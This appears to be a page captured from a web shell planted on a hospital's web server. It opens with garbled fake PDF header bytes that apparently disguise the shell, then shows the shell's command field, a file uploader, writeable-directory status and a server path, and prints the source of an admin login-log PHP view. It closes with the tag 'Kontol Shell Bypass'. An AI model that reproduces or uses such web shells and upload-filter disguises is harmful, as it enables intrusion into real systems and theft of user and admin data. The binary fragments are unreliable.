%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/incident/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/incident/application/views/adminlogs.php
<div class="wrapper d-flex align-items-stretch">

<?php include('_parts/admin_sidebar.php') ?>

    <div id="content">
    <?php include('_parts/admin_internal_header.php') ?>
        <div class="main-body">
        <div class="headings">
		
					<h4>Manage Admin Log</h4> 
                    </div>
                     <div class="white-box">
					 
						  <div class="scrolling-table">
					<table class="table3">
						<thead>
							<tr>
								<th>#</th>
								<th> User Email</th>
								<th>User IP </th>
								<th>Login Time</th>
								<th>Logout Time </th>
								<th>Status </th>
								
							</tr>
						</thead>
						<tbody>

							<?php 
							$cnt =1;
							foreach($responseArray as $row)
							{
							?>									
							<tr>
								<tr>
											<td><?php echo htmlentities($cnt);?></td>
											<td><?php echo htmlentities($row['username']);?></td>
											<td><?php echo htmlentities($row['userip']);?></td>
											<td> <?php echo htmlentities($row['loginTime']);?></td>
											<td><?php echo htmlentities($row['logout']); ?></td>
											<td><?php $st=$row['status'];
											if($st==1)
											{
												echo '<span class="active-status">Successfull</span>';
											}
											else
											{
												echo '<span class="inactive-status">Failed</span>';
											} ?></td>
											
											
										<?php $cnt=$cnt+1; } ?>
							</tr>
					</table>
				</div>
				</div>
			 
        
        </div>   	
	</div>
</div>
  <script src="<?=base_url('assets/js/popper.js'); ?>"></script>
<script src="<?=base_url('assets/js/main.js'); ?>"></script>

Kontol Shell Bypass